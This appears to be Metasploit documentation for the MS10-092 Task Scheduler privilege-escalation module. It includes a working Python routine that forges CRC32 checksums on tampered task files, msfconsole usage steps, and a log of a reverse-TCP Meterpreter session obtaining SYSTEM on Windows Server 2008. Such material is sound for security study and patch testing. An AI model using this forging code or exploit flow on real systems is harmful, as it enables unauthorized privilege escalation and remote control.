## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32
checksum to validate that the file has not been tampered with. Also, in a default
configuration, normal users can read and write the task files that they have
created. By modifying the task file and creating a CRC32 collision, an attacker
can execute arbitrary commands with SYSTEM privileges.
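Why a CRC32 is not an integrity check, as an added example that is not part of the module or its documentation: `crc32_patch` appends four bytes to a tampered buffer so that its zlib CRC32 equals the stored value, and `demo` contrasts that with an HMAC, which cannot be adjusted the same way. The `RunLevel` strings and the key are constructed sample values.

```python
import hashlib
import hmac
import zlib

# Reflected CRC-32 table (polynomial 0xEDB88320), the same algorithm zlib.crc32 uses.
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    TABLE.append(c)
# The top byte of every table entry is distinct, so it identifies that entry's index.
BY_TOP_BYTE = {t >> 24: i for i, t in enumerate(TABLE)}

def crc32_patch(tampered: bytes, target_crc: int) -> bytes:
    """Return four bytes which, appended to `tampered`, make zlib.crc32 equal target_crc.
    Each CRC step shifts one byte out of the 32-bit register, so four chosen bytes
    steer the register to any wanted value; no collision search is needed."""
    reg = zlib.crc32(tampered) ^ 0xFFFFFFFF   # internal register after `tampered`
    want = target_crc ^ 0xFFFFFFFF            # register value we need at the end
    idx = []                                  # table indices, recovered last-to-first
    for _ in range(4):
        i = BY_TOP_BYTE[want >> 24]
        idx.append(i)
        want = ((want ^ TABLE[i]) << 8) & 0xFFFFFFFF
    idx.reverse()
    out = bytearray()
    for i in idx:                             # choose each byte so it selects index i
        out.append((reg ^ i) & 0xFF)
        reg = (reg >> 8) ^ TABLE[i]
    return bytes(out)

def crc_check(data: bytes, expected_crc: int) -> bool:
    """The weak check: only a CRC32 guards the contents."""
    return zlib.crc32(data) == expected_crc

def hmac_check(data: bytes, key: bytes, expected_tag: bytes) -> bool:
    """A keyed check: without the key the tag cannot be recomputed or patched."""
    return hmac.compare_digest(hmac.new(key, data, hashlib.sha256).digest(), expected_tag)

def demo() -> tuple:
    """Tamper with a stored record and test it against both checks."""
    original = b"RunLevel=LeastPrivilege"      # constructed sample record
    tampered = b"RunLevel=HighestAvailable"    # constructed edit
    stored_crc = zlib.crc32(original)
    key = b"constructed-demo-key"
    stored_tag = hmac.new(key, original, hashlib.sha256).digest()
    forged = tampered + crc32_patch(tampered, stored_crc)
    return crc_check(forged, stored_crc), hmac_check(forged, key, stored_tag)
```

`demo()` returns `(True, False)`: the CRC32 check accepts the tampered record while the HMAC check rejects it, which is why only a keyed MAC or an ACL that blocks user writes can protect such files.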

## Verification Steps

1. Start msfconsole
2. Get a Meterpreter session
3. Do: `use exploit/windows/local/ms10_092_schelevator`
4. Do: `set SESSION <session id>`
5. Do: `run`

## Options

### TASKNAME

A name for the created task (default is random)

## Scenarios

### Windows Server 2008 SP1 (x64)

```
msf6 > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
[*] Creating task: qThxbR37
[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
[*] Original CRC32: 0xec6cfb1d
[*] Final CRC32: 0xec6cfb1d
[*] Writing our modified content back...
[*] Validating task: qThxbR37
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Executing the task...
[*] Sending stage (200774 bytes) to 192.168.200.218
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
[*] Deleting task pcT2p46d0...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-17B09RRRJTG
OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : CORP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```
